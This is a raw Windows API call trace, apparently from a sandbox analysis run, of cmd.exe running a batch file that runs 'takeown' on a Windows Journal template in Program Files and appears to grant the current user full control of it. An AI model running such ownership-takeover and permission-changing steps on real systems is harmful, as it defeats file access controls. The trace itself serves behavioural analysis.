_wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0220.579] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0220.579] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0220.579] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0220.579] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0220.579] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0220.579] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0220.579] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0220.579] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0220.579] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0220.579] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0220.579] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0220.579] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0220.579] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0220.579] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0220.579] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0220.579] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0220.580] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0220.580] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0220.580] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0220.580] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0220.580] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0220.580] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0220.580] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0220.580] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0220.580] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0220.580] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0220.580] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0220.580] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0220.580] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0220.580] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0220.580] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0220.580] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0220.580] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0220.580] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0220.580] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0220.580] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0220.580] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0220.580] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0220.580] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0220.580] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0220.580] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0220.580] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0220.580] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0220.580] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0220.580] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0220.580] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0220.580] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0220.580] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0220.580] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0220.580] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0220.580] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0220.580] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0220.580] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0220.580] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0220.580] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0220.580] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0220.580] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0220.580] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0220.580] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0220.580] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0220.580] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0220.580] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0220.580] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0220.580] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0220.580] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0220.580] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0220.580] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0220.580] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0220.581] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0220.581] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0220.581] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0220.581] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0220.581] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0220.581] SetErrorMode (uMode=0x0) returned 0x0 [0220.581] SetErrorMode (uMode=0x1) returned 0x0 [0220.581] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xaacd50, lpFilePart=0x92ebfc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x92ebfc*="Desktop") returned 0x1d [0220.581] SetErrorMode (uMode=0x0) returned 0x1 [0220.581] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0220.581] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0220.581] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.581] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.581] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x92e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92e988) returned 0xffffffff [0220.581] GetLastError () returned 0x2 [0220.581] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.581] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x92e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92e988) returned 0xffffffff [0220.582] GetLastError () returned 0x2 [0220.582] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.582] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x92e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92e988) returned 0xaa0b68 [0220.582] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0220.582] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x92e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92e988) returned 0xffffffff [0220.582] GetLastError () returned 0x2 [0220.582] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x92e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92e988) returned 0xaa0b68 [0220.582] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0220.582] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0220.582] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0220.582] GetConsoleTitleW (in: lpConsoleTitle=0x92ee7c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.582] InitializeProcThreadAttributeList (in: lpAttributeList=0x92eda8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x92ed8c | out: lpAttributeList=0x92eda8, lpSize=0x92ed8c) returned 1 [0220.582] UpdateProcThreadAttribute (in: lpAttributeList=0x92eda8, dwFlags=0x0, Attribute=0x60001, lpValue=0x92ed94, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x92eda8, lpPreviousValue=0x0) returned 1 [0220.582] GetStartupInfoW (in: lpStartupInfo=0x92ede0 | out: lpStartupInfo=0x92ede0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.583] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.583] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0220.583] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x92ed30*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x92ed7c | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\"", lpProcessInformation=0x92ed7c*(hProcess=0xb0, hThread=0xb8, dwProcessId=0xb48, dwThreadId=0x5b8)) returned 1 [0220.589] CloseHandle (hObject=0xb8) returned 1 [0220.589] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0220.589] GetEnvironmentStringsW () returned 0xaab2f0* [0220.589] FreeEnvironmentStringsA (penv="=") returned 1 [0220.589] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0221.332] GetExitCodeProcess (in: hProcess=0xb0, lpExitCode=0x92ed14 | out: lpExitCode=0x92ed14*=0x0) returned 1 [0221.332] CloseHandle (hObject=0xb0) returned 1 [0221.332] _vsnwprintf (in: _Buffer=0x92edfc, _BufferCount=0x13, _Format="%08X", _ArgList=0x92ed1c | out: _Buffer="00000000") returned 8 [0221.332] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0221.332] GetEnvironmentStringsW () returned 0xaab2f0* [0221.333] FreeEnvironmentStringsA (penv="=") returned 1 [0221.333] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0221.333] GetEnvironmentStringsW () returned 0xaab2f0* [0221.333] FreeEnvironmentStringsA (penv="=") returned 1 [0221.333] DeleteProcThreadAttributeList (in: lpAttributeList=0x92eda8 | out: lpAttributeList=0x92eda8) [0221.333] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.333] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0221.333] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.333] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0221.334] _get_osfhandle (_FileHandle=0) returned 0x38 [0221.334] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0221.334] SetConsoleInputExeNameW () returned 0x1 [0221.334] GetConsoleOutputCP () returned 0x1b5 [0221.334] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0221.334] SetThreadUILanguage (LangId=0x0) returned 0x409 [0221.334] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x92f53c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0221.334] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0221.334] _get_osfhandle (_FileHandle=3) returned 0xb0 [0221.334] SetFilePointer (in: hFile=0xb0, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0221.335] _get_osfhandle (_FileHandle=3) returned 0xb0 [0221.335] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0221.335] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x92f50c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x92f50c*=0xb3, lpOverlapped=0x0) returned 1 [0221.335] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0221.335] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=16, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0221.335] _get_osfhandle (_FileHandle=3) returned 0xb0 [0221.335] GetFileType (hFile=0xb0) returned 0x1 [0221.335] _get_osfhandle (_FileHandle=3) returned 0xb0 [0221.335] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0221.335] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp", nBufferLength=0x208, lpBuffer=0x92ec88, lpFilePart=0x92ec4c | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp", lpFilePart=0x92ec4c*="Genko_1.jtp") returned 0x36 [0221.335] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x92e990 | out: lpFindFileData=0x92e990) returned 0xaa0b68 [0221.335] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0221.335] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0221.335] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x92e990 | out: lpFindFileData=0x92e990) returned 0xaa0b68 [0221.336] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0221.336] _wcsnicmp (_String1="WIA843~1", _String2="Windows Journal", _MaxCount=0xf) returned -13 [0221.336] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates", lpFindFileData=0x92e990 | out: lpFindFileData=0x92e990) returned 0xaa0b68 [0221.336] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0221.336] _wcsnicmp (_String1="TEMPLA~1", _String2="Templates", _MaxCount=0x9) returned 10 [0221.336] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp", lpFindFileData=0x92e990 | out: lpFindFileData=0x92e990) returned 0xaa0b68 [0221.336] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0221.336] _wcsicmp (_String1="set", _String2=")") returned 74 [0221.336] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0221.336] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0221.336] _wcsicmp (_String1="IF", _String2="set") returned -10 [0221.336] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0221.336] _wcsicmp (_String1="REM", _String2="set") returned -1 [0221.336] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0221.337] _tell (_FileHandle=3) returned 63 [0221.337] _close (_FileHandle=3) returned 0 [0221.337] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x92f2d0 | out: _Buffer="\r\n") returned 2 [0221.337] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.337] GetFileType (hFile=0x3c) returned 0x2 [0221.337] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.337] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f2a8 | out: lpMode=0x92f2a8) returned 1 [0221.337] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.337] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f2c0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f2c0*=0x2) returned 1 [0221.338] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0221.338] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0221.338] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x92f2cc | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0221.338] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x92f2cc | out: _Buffer=">") returned 1 [0221.338] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.338] GetFileType (hFile=0x3c) returned 0x2 [0221.338] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.338] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f2ac | out: lpMode=0x92f2ac) returned 1 [0221.338] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.339] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x92f2c4, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x92f2c4*=0x1e) returned 1 [0221.339] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.339] GetFileType (hFile=0x3c) returned 0x2 [0221.339] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.339] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f54c | out: lpMode=0x92f54c) returned 1 [0221.340] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.340] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xab83c0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x92f564, lpReserved=0x0 | out: lpBuffer=0xab83c0*, lpNumberOfCharsWritten=0x92f564*=0x3) returned 1 [0221.340] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x92f56c | out: _Buffer=" FN=\"Genko_1.jtp\" ") returned 18 [0221.340] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.340] GetFileType (hFile=0x3c) returned 0x2 [0221.340] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.342] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f544 | out: lpMode=0x92f544) returned 1 [0221.343] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.343] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x12, lpNumberOfCharsWritten=0x92f55c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f55c*=0x12) returned 1 [0221.343] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x92f580 | out: _Buffer="\r\n") returned 2 [0221.343] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.343] GetFileType (hFile=0x3c) returned 0x2 [0221.343] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.343] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f558 | out: lpMode=0x92f558) returned 1 [0221.347] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.347] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f570, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f570*=0x2) returned 1 [0221.347] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0221.347] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0221.347] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0221.347] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0221.347] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0221.347] _wcsicmp (_String1="set", _String2="CD") returned 16 [0221.347] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0221.347] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0221.347] _wcsicmp (_String1="set", _String2="REN") returned 1 [0221.347] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0221.347] _wcsicmp (_String1="set", _String2="SET") returned 0 [0221.347] GetConsoleTitleW (in: lpConsoleTitle=0x92f0f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.348] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0221.348] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0221.348] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0221.348] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0221.348] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0221.348] _wcsicmp (_String1="set", _String2="CD") returned 16 [0221.348] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0221.348] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0221.348] _wcsicmp (_String1="set", _String2="REN") returned 1 [0221.348] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0221.348] _wcsicmp (_String1="set", _String2="SET") returned 0 [0221.348] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0221.348] _wcsnicmp (_String1="FN", _String2="/A", _MaxCount=0x2) returned 55 [0221.348] _wcsnicmp (_String1="FN", _String2="/P", _MaxCount=0x2) returned 55 [0221.348] SetEnvironmentVariableW (lpName="FN", lpValue="\"Genko_1.jtp\"") returned 1 [0221.348] GetEnvironmentStringsW () returned 0xaab2f0* [0221.348] FreeEnvironmentStringsA (penv="=") returned 1 [0221.348] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.348] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0221.349] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.349] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0221.362] _get_osfhandle (_FileHandle=0) returned 0x38 [0221.362] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0221.456] SetConsoleInputExeNameW () returned 0x1 [0221.456] GetConsoleOutputCP () returned 0x1b5 [0221.477] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0221.477] SetThreadUILanguage (LangId=0x0) returned 0x409 [0221.487] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x92f53c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0221.487] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0221.487] _get_osfhandle (_FileHandle=3) returned 0xb0 [0221.487] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0221.488] _get_osfhandle (_FileHandle=3) returned 0xb0 [0221.488] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f 